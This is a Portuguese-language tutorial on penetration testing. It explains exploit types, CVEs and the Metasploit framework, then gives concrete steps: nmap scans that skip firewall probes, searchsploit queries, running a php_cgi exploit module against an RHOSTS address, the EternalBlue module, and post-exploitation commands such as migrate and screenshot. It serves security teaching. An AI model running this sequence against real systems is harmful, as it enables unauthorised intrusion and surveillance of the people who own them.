Exploração do Alvo

A Invasão Propriamente Dita

A exploração do alvo é o ato de “invadir” uma máquina usando exploits ou explorando falhas de configuração.


🛠️ Ferramentas Utilizadas

  • Metasploit Framework — O principal framework de exploração

🎯 Formas de Exploração

A exploração acontece de duas formas principais:

TipoDescrição
Engenharia SocialNão é necessária a existência de vulnerabilidades técnicas
Falha de SoftwareServiço ou configuração vulnerável

Evolução dos Exploits

Antigamente, buscar exploits era difícil e as fontes eram duvidosas. Hoje, existem repositórios específicos e confiáveis.


📚 Repositórios de Exploits

Fontes Gratuitas

A maioria dos repositórios de exploits são gratuitos.

RepositórioURL
Exploit-DBexploit-db.com
PacketStormpacketstormsecurity.com
SecurityFocussecurityfocus.com
1337daywww1337day.com
OSVDBosvdb.org
SecuriTeamsecuriteam.com
Intelligent Exploitintelligentexploit.com
CERT Vulskb.cert.org/vuls

Repositório Pago

VUPEN — vupen.com (comercial)


💥 Introdução aos Exploits

O que é um Exploit?

Um exploit é um pedaço de software, conjunto de dados ou sequência de comandos que aproveita uma falha ou vulnerabilidade para causar comportamento não intencional.

Tipos Mais Comuns de Exploits

TipoDescrição
Buffer OverflowSobrescreve memória ao escrever mais dados que o buffer suporta
InjectionInsere código malicioso (SQL Injection, XSS)
Zero-dayExplora vulnerabilidade desconhecida, sem patch disponível
Privilege EscalationObtém privilégios elevados (admin) através de bugs
Remote Code Execution (RCE)Executa comandos remotamente no sistema alvo
Denial of Service (DoS)Torna sistema indisponível por sobrecarga

Nota

Muitos exploits combinam várias categorias. Um buffer overflow pode permitir RCE, e um SQL injection pode levar a privilege escalation.


🔓 Vulnerabilidades

Definição

Uma vulnerabilidade é uma fraqueza que pode ser explorada para violar a integridade, disponibilidade ou confidencialidade de um sistema.

Tipos de Vulnerabilidades

  • Software — Bugs ou erros de programação
  • Hardware — Falhas em componentes físicos
  • Configuração — Configurações inseguras
  • Design — Falhas na arquitetura do sistema

Ciclo de Gerenciamento

  1. Descoberta — Pentests, varreduras, auditorias, análise de código
  2. Classificação — Avaliação de gravidade (CVSS)
  3. Priorização — Qual corrigir primeiro?
  4. Mitigação — Patches, reconfiguração, firewalls, IDS/IPS

CVE — Common Vulnerabilities and Exposures

Identificação Padronizada

Sistema que fornece referência única para vulnerabilidades conhecidas.

Formato: CVE-AAAA-BBBB

  • AAAA — Ano de divulgação
  • BBBB — Número único

Exemplo: CVE-2021-34527 (PrintNightmare)


🤖 Metasploit Framework

O Melhor Framework Gratuito

O Metasploit Framework (MSF) é o melhor framework gratuito para desenvolver, testar e usar exploits.

Arquitetura

O Metasploit é dividido em 3 categorias:

CategoriaDescrição
BibliotecasBase de código do framework
InterfacesMeios de interação (msfconsole, Armitage)
MódulosExploits, payloads, auxiliares

Descrição dos Módulos

MóduloFunção
ExploitProva de conceito que a vulnerabilidade existe
PayloadCódigo que executa comandos no alvo (ex: shell reverso)
ShellcodeCódigo que causa buffer overflow
AuxiliaresFerramentas auxiliares (scanners, sniffers, DoS)
EncodersBurlar antivírus, firewalls, IDS

Outros Frameworks

Existem frameworks pagos como Core Impact, Immunity Canvas, Cobalt Strike e PowerShell Empire. Mas o Metasploit é gratuito, open-source e frequentemente atualizado.


💻 Comandos Essenciais do Metasploit

ComandoFunção
searchProcurar ferramentas e exploits
useSelecionar um exploit
show optionsMostrar opções do exploit
setConfigurar um parâmetro
exploit ou runExecutar o exploit

🚀 Utilização do Metasploit

Atualização

sudo apt update; sudo apt install metasploit-framework

Escaneamento com Nmap

Antes de usar o Metasploit, escaneie a rede para descobrir alvos:

# Escanear range de IPs (ignorar firewalls)
nmap -PN 192.168.0.1-255
 
# Verificar versões de serviços
nmap -sV 192.168.0.10 -p 80,443

Iniciando o Metasploit

sudo msfconsole -q

Pesquisando Exploits

# Buscar exploits para Apache 2.2.8
searchsploit apache 2.2.8
 
# Filtrar resultados
searchsploit apache 2.2.8 | grep php

Usando um Exploit

# Selecionar exploit
use exploit/multi/http/php_cgi
 
# Definir alvo
set RHOSTS 192.168.18.47
 
# Executar
run

⭐ Exploits Populares

Exploits de Estimação

Alguns exploits clássicos que todo pentester conhece:

  • smb_ms17_010 — Scanner para EternalBlue
  • exploit/windows/smb/ms17_010_eternalblue — EternalBlue (WannaCry)

🖥️ Comandos Pós-Exploração

Após conseguir acesso (shell), comandos úteis:

# Informações do sistema
sysinfo
 
# Verificar privilégios
getuid
 
# Listar processos
ps
 
# Migrar para outro processo
migrate [PID]
 
# Capturar screenshot
screenshot